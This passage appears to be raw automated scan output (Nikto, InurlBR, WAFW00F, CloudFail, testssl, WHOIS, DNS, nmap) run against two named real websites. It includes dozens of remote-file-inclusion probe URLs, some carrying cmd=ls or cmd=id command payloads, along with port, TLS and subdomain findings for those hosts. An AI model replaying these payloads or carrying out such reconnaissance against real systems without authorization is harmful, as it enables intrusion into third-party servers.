  1068. + /index.php?includesdir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1069. + /index.php?insPath=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1070. + /index.php?lang=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1071. + /index.php?language=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1072. + /index.php?language=en&main_page=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1073. + /index.php?lizge=http://cirt.net/rfiinc.txt??&cmd=ls: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1074. + /index.php?lng=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1075. + /index.php?load=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1076. + /index.php?loadpage=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1077. + /index.php?main_tabid=1&main_content=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1078. + /index.php?may=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1079. + /index.php?middle=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1080. + /index.php?mode=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1081. + /index.php?mode=http://cirt.net/rfiinc.txt??&cmd=: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1082. + /index.php?modpath=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1083. + /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1084. + /index.php?news7[\"functions\"]=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1085. + /index.php?news_include_path=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1086. + /index.php?open=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1087. + /index.php?option=com_custompages&cpage=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1088. + /index.php?page=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1089. + /index.php?page=http://cirt.net/rfiinc.txt?%00: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1090. + /index.php?page=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1091. + /index.php?pagehttp://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1092. + /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1093. + /index.php?pagename=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1094. + /index.php?pageNikto=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1095. + /index.php?pager=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1096. + /index.php?pagina=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1097. + /index.php?path_to_folder=http://cirt.net/rfiinc.txt??cmd=id: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1098. + /index.php?pg=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1099. + /index.php?pg=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1100. + /index.php?plugin=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1101. + /index.php?principal=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1102. + /index.php?proMod=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1103. + /index.php?proMod=http://cirt.net/rfiinc.txt??cmd: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1104. + /index.php?project=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1105. + /index.php?repinc=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1106. + /index.php?root_prefix=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1107. + /index.php?root_prefix=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1108. + /index.php?section=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1109. + /index.php?site=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1110. + /index.php?site_path=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1111. + /index.php?styl[top]=http://cirt.net/rfiinc.txt???: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1112. + /index.php?template=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1113. + /index.php?templates_dir=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1114. + /index.php?theme=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1115. + /index.php?themepath=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1116. + /index.php?themesdir=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1117. + /index.php?this_path=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1118. + /index.php?txt=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1119. + /index.php?up=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1120. + /index.php?url=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1121. + /index.php?w=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1122. + /index.php?way=http://cirt.net/rfiinc.txt???????????????: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1123. + /news.php?CONFIG[script_path]=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1124. + /news.php?config[root_ordner]=http://cirt.net/rfiinc.txt??&cmd=id: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1125. + /news.php?scriptpath=http://cirt.net/rfiinc.txt??: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1126. + /news.php?vwar_root=http://cirt.net/rfiinc.txt?: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1127. + /news.php?vwar_root=http://cirt.net/rfiinc.txt??&cmd=ls: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1128. + /~/index.html: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1129. + /.web.config.swp: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1130. + /.svn/entries: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1131. + /.svn/wc.db: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1132. + /.git/index: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1133. + /.hg/dirstate: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1134. + /.git/HEAD: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1135. + /.bzr/branch-format: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1136. + /.hg/requires: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1137. + /.git/config: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1138. + /index.JSP: The mod_speling module can reveal otherwise 'hidden' files in directories.
  1139. + 7597 requests: 0 error(s) and 259 item(s) reported on remote host
  1140. + End Time:           2017-10-16 19:20:45 (GMT-4) (2053 seconds)
  1141. ---------------------------------------------------------------------------
  1142. + 1 host(s) tested
  1143.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  1144. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/nccuties.com-port80.jpg
  1145.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  1146.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  1147.  
  1148.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  1149.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  1150.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  1151.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  1152.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  1153.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  1154.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  1155.  
  1156. __[ ! ] Neither war between hackers, nor peace for the system.
  1157. __[ ! ] http://blog.inurl.com.br
  1158. __[ ! ] http://fb.com/InurlBrasil
  1159. __[ ! ] http://twitter.com/@googleinurl
  1160. __[ ! ] http://github.com/googleinurl
  1161. __[ ! ] Current PHP version::[ 7.0.22-3 ]
  1162. __[ ! ] Current script owner::[ root ]
  1163. __[ ! ] Current uname::[ Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-1kali1 (2017-10-03) x86_64 ]
  1164. __[ ! ] Current pwd::[ /usr/share/sniper ]
  1165. __[ ! ] Help: php inurlbr.php --help
  1166. ------------------------------------------------------------------------------------------------------------------------
  1167. [ ! ] Starting SCANNER INURLBR 2.1 at [16-10-2017 19:22:50]
  1168. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1169. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1170. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1171. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nccuties.com.txt  ]
  1172. [ INFO ][ DORK ]::[ site:nccuties.com ]
  1173. [ INFO ][ SEARCHING ]:: {
  1174. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.nr ]
  1175. [ INFO ][ SEARCHING ]:: 
  1176. -[:::]
  1177. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1178. [ INFO ][ SEARCHING ]:: 
  1179. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1180. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.fr ID: 013269018370076798483:wdba3dlnxqm ]
  1181. [ INFO ][ SEARCHING ]:: 
  1182. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1183. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  1184. [ INFO ] Not a satisfactory result was found!
  1185. [ INFO ] [ Shutting down ]
  1186. [ INFO ] [ End of process INURLBR at [16-10-2017 19:23:00]
  1187. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1188. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nccuties.com.txt  ]
  1189. |_________________________________________________________________________________________
  1190.  
  1191. \_________________________________________________________________________________________/
  1192.  
  1193.  + -- --=[Port 110 closed... skipping.
  1194.  + -- --=[Port 111 closed... skipping.
  1195.  + -- --=[Port 135 closed... skipping.
  1196.  + -- --=[Port 139 closed... skipping.
  1197.  + -- --=[Port 161 closed... skipping.
  1198.  + -- --=[Port 162 closed... skipping.
  1199.  + -- --=[Port 389 closed... skipping.
  1200.  + -- --=[Port 443 opened... running tests...
  1201.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1202.  
  1203.                                  ^     ^
  1204.         _   __  _   ____ _   __  _    _   ____
  1205.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1206.       | V V // o // _/ | V V // 0 // 0 // _/
  1207.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  1208.                                 <
  1209.                                  ...'
  1210.  
  1211.     WAFW00F - Web Application Firewall Detection Tool
  1212.  
  1213.     By Sandro Gauci && Wendel G. Henrique
  1214.  
  1215. Checking https://nccuties.com
  1216.  
  1217.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  1218.    ____ _                 _ _____     _ _
  1219.   / ___| | ___  _   _  __| |  ___|_ _(_) |
  1220.  | |   | |/ _ \| | | |/ _` | |_ / _` | | |
  1221.  | |___| | (_) | |_| | (_| |  _| (_| | | |
  1222.   \____|_|\___/ \__,_|\__,_|_|  \__,_|_|_|
  1223.     v1.0.1                      by m0rtem
  1224.  
  1225.  
  1226. [19:23:04] Initializing CloudFail - the date is: 16/10/2017  
  1227. [19:23:04] Fetching initial information from: nccuties.com...  
  1228. [19:23:04] Server IP: 216.250.120.114  
  1229. [19:23:04] Testing if nccuties.com is on the Cloudflare network...  
  1230. [19:23:04] nccuties.com is not part of the Cloudflare network, quitting...  
  1231.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1232.  
  1233.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  1234.  
  1235.  
  1236.  
  1237.  AVAILABLE PLUGINS
  1238.  -----------------
  1239.  
  1240.   PluginChromeSha1Deprecation
  1241.   PluginHeartbleed
  1242.   PluginSessionResumption
  1243.   PluginHSTS
  1244.   PluginSessionRenegotiation
  1245.   PluginCertInfo
  1246.   PluginOpenSSLCipherSuites
  1247.   PluginCompression
  1248.  
  1249.  
  1250.  
  1251.  CHECKING HOST(S) AVAILABILITY
  1252.  -----------------------------
  1253.  
  1254.    nccuties.com:443                    => 216.250.120.114:443
  1255.  
  1256.  
  1257.  
  1258.  SCAN RESULTS FOR NCCUTIES.COM:443 - 216.250.120.114:443
  1259.  -------------------------------------------------------
  1260.  
  1261. Unhandled exception when processing --reneg:
  1262. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TLS / Unexpected EOF
  1263.  
  1264. Unhandled exception when processing --compression:
  1265. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TLS / Unexpected EOF
  1266.  
  1267.   * Session Resumption:
  1268.       With Session IDs:                  ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
  1269.         ERROR #1: SSLHandshakeRejected - TLS / Unexpected EOF
  1270.         ERROR #2: SSLHandshakeRejected - TLS / Unexpected EOF
  1271.         ERROR #3: SSLHandshakeRejected - TLS / Unexpected EOF
  1272.         ERROR #4: SSLHandshakeRejected - TLS / Unexpected EOF
  1273.         ERROR #5: SSLHandshakeRejected - TLS / Unexpected EOF
  1274.       With TLS Session Tickets:          ERROR: SSLHandshakeRejected - TLS / Unexpected EOF
  1275.  
  1276. Unhandled exception when processing --certinfo:
  1277. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TLS / Unexpected EOF
  1278.  
  1279.   * SSLV2 Cipher Suites:
  1280.       Server rejected all cipher suites.
  1281.  
  1282.   * SSLV3 Cipher Suites:
  1283.       Server rejected all cipher suites.
  1284.  
  1285.  SCAN COMPLETED IN 11.22 S
  1286.  -------------------------
  1287. Version: 1.11.10-static
  1288. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1289. 
  1290. Testing SSL server nccuties.com on port 443 using SNI name nccuties.com
  1291.  
  1292.   TLS Fallback SCSV:
  1293. Connection failed - unable to determine TLS Fallback SCSV support
  1294.  
  1295.   TLS renegotiation:
  1296. Session renegotiation not supported
  1297.  
  1298.   TLS Compression:
  1299. Compression disabled
  1300.  
  1301.   Heartbleed:
  1302. TLS 1.2 not vulnerable to heartbleed
  1303. TLS 1.1 not vulnerable to heartbleed
  1304. TLS 1.0 not vulnerable to heartbleed
  1305.  
  1306.   Supported Server Cipher(s):
  1307. 
  1308. ###########################################################
  1309.     testssl       2.9dev from https://testssl.sh/dev/
  1310. 
  1311.       This program is free software. Distribution and
  1312.              modification under GPLv2 permitted.
  1313.       USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  1314.  
  1315.        Please file bugs @ https://testssl.sh/bugs/
  1316. 
  1317. ###########################################################
  1318.  
  1319.  Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  1320.  on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  1321.  (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  1322.  
  1323.  
  1324.  Start 2017-10-16 19:23:39        -->> 216.250.120.114:443 (nccuties.com) <<--
  1325.  
  1326.  rDNS (216.250.120.114): perfora.net.
  1327.  
  1328.  216.250.120.114:443 doesn't seem to be a TLS/SSL enabled server
  1329.  The results might look ok but they could be nonsense. Really proceed ? ("yes" to continue) -->  Service detected:       Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
  1330.  Testing protocols via sockets except SPDY+HTTP2 
  1331.  
  1332.  SSLv2      not offered (OK)
  1333.  SSLv3      not offered (OK)
  1334.  TLS 1      not offered
  1335.  TLS 1.1    not offered
  1336.  TLS 1.2    not offered
  1337.  SPDY/NPN   (SPDY is an HTTP protocol and thus not tested here)
  1338.  HTTP2/ALPN (HTTP/2 is a HTTP protocol and thus not tested here)
  1339.  Testing ~standard cipher categories 
  1340.  NULL ciphers (no encryption)                  not offered (OK)
  1341.  Anonymous NULL Ciphers (no authentication)    not offered (OK)
  1342.  Export ciphers (w/o ADH+NULL)                 not offered (OK)
  1343.  LOW: 64 Bit + DES encryption (w/o export)     not offered (OK)
  1344.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    not offered (OK)
  1345.  Triple DES Ciphers (Medium)                   not offered (OK)
  1346.  High encryption (AES+Camellia, no AEAD)       not offered
  1347.  Strong encryption (AEAD ciphers)              not offered
  1348.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  1349.  No ciphers supporting Forward Secrecy offered
  1350.  Testing server preferences 
  1351.  Has sever cipher order?     no matching cipher in this list found (pls report this): DES-CBC3-SHA:RC4-MD5:DES-CBC-SHA:RC4-SHA:AES128-SHA:AES128-SHA256:AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDH-RSA-DES-CBC3-SHA:ECDH-RSA-AES128-SHA:ECDH-RSA-AES256-SHA:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:DHE-DSS-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:AES256-SHA256  .
  1352.  Testing server defaults (Server Hello) 
  1353.  
  1354.  TLS extensions (standard)    (none)
  1355.  Session Ticket RFC 5077 hint (no lifetime advertised)
  1356.  SSL Session ID support       yes
  1357.  Session Resumption           Ticket resumption test failed, pls report / ID resumption test failed, pls report
  1358.  TLS clock skew               SSLv3 through TLS 1.2 didn't return a timestamp
  1359.  
  1360.  Testing vulnerabilities 
  1361.  
  1362.  Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension
  1363.  CCS (CVE-2014-0224)                       not vulnerable (OK)
  1364.  Ticketbleed (CVE-2016-9244), experiment.  --   (applicable only for HTTPS)
  1365.  Secure Renegotiation (CVE-2009-3555)      handshake didn't succeed
  1366.  Secure Client-Initiated Renegotiation     not vulnerable (OK)
  1367.  CRIME, TLS (CVE-2012-4929)                test failed (couldn't connect)
  1368.  POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)
  1369.  TLS_FALLBACK_SCSV (RFC 7507)              No fallback possible, TLS 1.2 is the only protocol (OK)
  1370.  SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)
  1371.  FREAK (CVE-2015-0204)                     not vulnerable (OK)
  1372.  DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)
  1373.                                            no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  1374.  LOGJAM (CVE-2015-4000), experimental      not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  1375.  BEAST (CVE-2011-3389)                     no SSL3 or TLS1 (OK)
  1376.  LUCKY13 (CVE-2013-0169), experimental     not vulnerable (OK)
  1377.  RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)
  1378.  
  1379.  
  1380.  Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  1381.  
  1382. Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
  1383. -----------------------------------------------------------------------------------------------------------------------------
  1384.  
  1385. Could not determine the protocol, only simulating generic clients.
  1386.  
  1387.  Running client simulations via sockets 
  1388.  
  1389.  Java 6u45                    No connection
  1390.  Java 7u25                    No connection
  1391.  Java 8u31                    No connection
  1392.  OpenSSL 1.0.1l               No connection
  1393.  OpenSSL 1.0.2e               No connection
  1394.  
  1395.  Done 2017-10-16 19:33:51 [ 616s] -->> 216.250.120.114:443 (nccuties.com) <<--
  1396. ######################################################################################################################################
  1397. Hostname    www.tinymodel-sugar.info        ISP     Quasi Networks LTD. (AS29073)
  1398. Continent   Africa      Flag    
  1399. SC
  1400. Country     Seychelles      Country Code    SC (SYC)
  1401. Region  Unknown         Local time  17 Oct 2017 03:11 +04
  1402. City    Unknown         Latitude    -4.583
  1403. IP Address  94.102.49.48        Longitude   55.667
  1404. ####################################################################################################################################
  1405. [i] Scanning Site: http://tinymodel-sugar.info
  1406.  
  1407. B A S I C   I N F O
  1408. ====================
  1409.  
  1410. [+] Site Title: TinyModel Sugar
  1411. [+] IP address: 94.102.49.48
  1412. [+] Web Server: nginx/1.0.6
  1413. [+] CMS: Could Not Detect
  1414. [+] Cloudflare: Not Detected
  1415. [+] Robots File: Could NOT Find robots.txt!
  1416.  
  1417. W H O I S   L O O K U P
  1418. ========================
  1419.  
  1420.     Domain Name: TINYMODEL-SUGAR.INFO
  1421. Registry Domain ID: D28554615-LRMS
  1422. Registrar WHOIS Server:
  1423. Registrar URL: http://www.onlinenic.com
  1424. Updated Date: 2017-04-16T23:48:40Z
  1425. Creation Date: 2009-05-17T21:31:46Z
  1426. Registry Expiry Date: 2018-05-17T21:31:46Z
  1427. Registrar Registration Expiration Date:
  1428. Registrar: OnlineNIC, Inc.
  1429. Registrar IANA ID: 82
  1430. Registrar Abuse Contact Email:
  1431. Registrar Abuse Contact Phone:
  1432. Reseller:
  1433. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  1434. Registry Registrant ID: C158550971-LRMS
  1435. Registrant Name: Laura Yun
  1436. Registrant Organization: Offshore Hosting Ltd
  1437. Registrant Street: Oliaji TradeCenter 1st floor
  1438. Registrant City: Victoria
  1439. Registrant State/Province: Mahe
  1440. Registrant Postal Code: 3326
  1441. Registrant Country: AF
  1442. Registrant Phone: +248.2234234
  1443. Registrant Phone Ext:
  1444. Registrant Fax: +248.2234234
  1445. Registrant Fax Ext:
  1446. Registrant Email: domains@offshore-hosting-service.com
  1447. Registry Admin ID: C158550967-LRMS
  1448. Admin Name: Laura Yun
  1449. Admin Organization: Offshore Hosting Ltd
  1450. Admin Street: Oliaji TradeCenter 1st floor
  1451. Admin City: Victoria
  1452. Admin State/Province: Mahe
  1453. Admin Postal Code: 3326
  1454. Admin Country: AF
  1455. Admin Phone: +248.2234234
  1456. Admin Phone Ext:
  1457. Admin Fax: +248.2234234
  1458. Admin Fax Ext:
  1459. Admin Email: domains@offshore-hosting-service.com
  1460. Registry Tech ID: C158550968-LRMS
  1461. Tech Name: Laura Yun
  1462. Tech Organization: Offshore Hosting Ltd
  1463. Tech Street: Oliaji TradeCenter 1st floor
  1464. Tech City: Victoria
  1465. Tech State/Province: Mahe
  1466. Tech Postal Code: 3326
  1467. Tech Country: AF
  1468. Tech Phone: +248.2234234
  1469. Tech Phone Ext:
  1470. Tech Fax: +248.2234234
  1471. Tech Fax Ext:
  1472. Tech Email: domains@offshore-hosting-service.com
  1473. Registry Billing ID: C158550969-LRMS
  1474. Billing Name: Laura Yun
  1475. Billing Organization: Offshore Hosting Ltd
  1476. Billing Street: Oliaji TradeCenter 1st floor
  1477. Billing City: Victoria
  1478. Billing State/Province: Mahe
  1479. Billing Postal Code: 3326
  1480. Billing Country: AF
  1481. Billing Phone: +248.2234234
  1482. Billing Phone Ext:
  1483. Billing Fax: +248.2234234
  1484. Billing Fax Ext:
  1485. Billing Email: domains@offshore-hosting-service.com
  1486. Name Server: NS1.MAGIC12.COM
  1487. Name Server: NS2.MAGIC12.COM
  1488. Name Server: NS3.MAGIC12.COM
  1489. Name Server: NS4.MAGIC12.COM
  1490.  
  1491. G E O  I P  L O O K  U P
  1492. =========================
  1493.  
  1494. [i] IP Address: 94.102.49.48
  1495. [i] Country: SC
  1496. [i] State: N/A
  1497. [i] City: N/A
  1498. [i] Latitude: -4.583300
  1499. [i] Longitude: 55.666698
  1500.  
  1501. H T T P   H E A D E R S
  1502. =======================
  1503.  
  1504. [i]  HTTP/1.1 200 OK
  1505. [i]  Server: nginx/1.0.6
  1506. [i]  Date: Mon, 16 Oct 2017 23:13:06 GMT
  1507. [i]  Content-Type: text/html
  1508. [i]  Connection: close
  1509. [i]  Content-Length: 3808
  1510. [i]  Vary: Accept-Encoding
  1511. [i]  Last-Modified: Sat, 07 Jan 2017 10:52:45 GMT
  1512. [i]  ETag: "ee0-5457eef355940"
  1513. [i]  Accept-Ranges: bytes
  1514.  
  1515. D N S   L O O K U P
  1516. ===================
  1517.  
  1518. tinymodel-sugar.info.   1   IN  A   94.102.49.50
  1519. tinymodel-sugar.info.   1   IN  A   94.102.49.48
  1520. tinymodel-sugar.info.   172799  IN  NS  ns1.magic12.com.
  1521. tinymodel-sugar.info.   172799  IN  NS  ns2.magic12.com.
  1522. tinymodel-sugar.info.   172799  IN  NS  ns3.magic12.com.
  1523. tinymodel-sugar.info.   2559    IN  SOA ns1.magic12.com. hostmaster.tinymodel-sugar.info. 1501702095 16384 2048 1048576 2560
  1524. tinymodel-sugar.info.   86399   IN  MX  0 mail3.magic12.com.
  1525. tinymodel-sugar.info.   3599    IN  TXT "v=spf1 mx -all"
  1526. tinymodel-sugar.info.   3599    IN  TXT "v=spf1 mx ip4:5.79.85.174 -all"
  1527.  
  1528. S U B N E T   C A L C U L A T I O N
  1529. ====================================
  1530.  
  1531. Address       = 94.102.49.50
  1532. Network       = 94.102.49.50 / 32
  1533. Netmask       = 255.255.255.255
  1534. Broadcast     = not needed on Point-to-Point links
  1535. Wildcard Mask = 0.0.0.0
  1536. Hosts Bits    = 0
  1537. Max. Hosts    = 1   (2^0 - 0)
  1538. Host Range    = { 94.102.49.50 - 94.102.49.50 }
  1539.  
  1540. N M A P   P O R T   S C A N
  1541. ============================
  1542.  
  1543.  
  1544. Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-16 23:13 UTC
  1545. Nmap scan report for tinymodel-sugar.info (94.102.49.50)
  1546. Host is up (0.083s latency).
  1547. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.48
  1548. rDNS record for 94.102.49.50: no-reverse-dns-configured.com
  1549. PORT     STATE  SERVICE       VERSION
  1550. 21/tcp   open   ftp           vsftpd 2.0.7
  1551. 22/tcp   open   ssh           OpenSSH 5.1p1 Debian 5 (protocol 2.0)
  1552. 23/tcp   closed telnet
  1553. 25/tcp   open   smtp          Postfix smtpd
  1554. 80/tcp   open   http          nginx 1.0.6
  1555. 110/tcp  closed pop3
  1556. 143/tcp  closed imap
  1557. 443/tcp  closed https
  1558. 445/tcp  closed microsoft-ds
  1559. 3389/tcp closed ms-wbt-server
  1560. Service Info: Host:  hosted-by.ecatel.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  1561.  
  1562. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1563. Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
  1564.  
  1565. S U B - D O M A I N   F I N D E R
  1566. ==================================
  1567.  
  1568. [i] Total Subdomains Found : 2
  1569.  
  1570. [+] Subdomain: tinymodel-sugar.info
  1571. [-] IP: 94.102.49.50
  1572.  
  1573. [+] Subdomain: tinymodel-sugar.info
  1574. [-] IP: 94.102.49.48
  1575.  
  1576. [*] Performing TLD Brute force Enumeration against tinymodel-sugar.info
  1577. [*] The operation could take up to: 00:01:07
  1578. [*]      A tinymodel-sugar.biz.af 5.45.75.45
  1579. [*]      CNAME tinymodel-sugar.biz.at free.biz.at
  1580. [*]      A free.biz.at 216.92.134.29
  1581. [*]      A tinymodel-sugar.co.asia 91.195.240.135
  1582. [*]      A tinymodel-sugar.org.aw 142.4.20.12
  1583. [*]      A tinymodel-sugar.org.ax 185.55.85.123
  1584. [*]      A tinymodel-sugar.com.ax 185.55.85.123
  1585. [*]      A tinymodel-sugar.co.ba 176.9.45.78
  1586. [*]      A tinymodel-sugar.com.ba 195.222.33.180
  1587. [*]      A tinymodel-sugar.com.be 95.173.170.166
  1588. [*]      A tinymodel-sugar.biz.by 71.18.52.2
  1589. [*]      A tinymodel-sugar.biz.bz 199.59.242.150
